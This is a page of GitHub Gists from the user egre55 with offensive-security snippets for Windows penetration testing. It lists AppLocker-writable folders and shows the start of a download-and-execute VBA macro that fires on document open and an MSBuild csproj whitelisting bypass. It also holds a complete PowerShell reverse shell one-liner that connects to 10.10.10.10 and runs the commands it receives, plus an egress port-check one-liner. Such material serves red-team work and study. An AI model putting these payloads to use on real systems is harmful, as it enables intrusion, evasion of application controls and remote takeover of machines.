egre55 egre55

@egre55
egre55 / applocker_bypass_checker.bat
Last active December 21, 2022 00:35
applocker bypass checker
@echo off
REM Influenced by the PowerShell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folders that are both writable
REM and executable under C:\Windows (whitelisted by the AppLocker default rules).
REM
REM However, environments implementing application whitelisting may also block powershell.exe.
REM
REM This is intended to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\ drive. Replace puttygen.exe as appropriate. Run as a
REM standard (non-admin) user ;D. Bypasses found are listed in bypasses.txt.
@egre55
egre55 / applocker_default_rules_bypass_writable_executable_windows_folders.txt
Last active December 21, 2022 00:35
applocker_default_rules_bypass_writable_executable_windows_folders.txt
# writable and executable Windows folders with AppLocker Default Rules in effect
Windows Server 2019 (Version 10.0.17763.914)
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\spool\drivers\color
@egre55
egre55 / powershell_binaries_assemblies.txt
Last active December 21, 2022 00:34
powershell binaries & assemblies
C:\>dir /B /S powershell.exe /S system.management.automation.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_968a6a2f18e547eb\powershell.exe
C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_1.0.0.0_none_6340379543bd8a03\System.Management.Automation.dll
C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_10.0.14393.0_none_f2bad6783ea6eb6a\System.Management.Automation.dll
C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_a0df14814d4609e6\powershell.exe
@egre55
egre55 / macro_download_and_execute_msbuild_csproj_powershell.vba
Last active December 21, 2022 00:34
macro - download and execute applocker bypass (msbuild / csproj / powershell)
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' powashell.csproj by @SubTee
' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0
Sub Document_Open()
Dim WinHttpReq As Object
Dim oStream As Object
Dim myURL As String
@egre55
egre55 / powershell_reverse_shell.ps1
Last active May 5, 2024 22:06
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@egre55
egre55 / powashell.csproj
Created February 19, 2018 00:20
powashell.csproj by Casey Smith @subTee
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@egre55
egre55 / egress_check.ps1
Last active March 4, 2024 07:21
egress check one-liner
# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
# Nmap top 50 ports. Checking more than 50 ports at once may exhaust memory (each port runs as a separate job)
foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job | Wait-Job | Get-Job | Receive-Job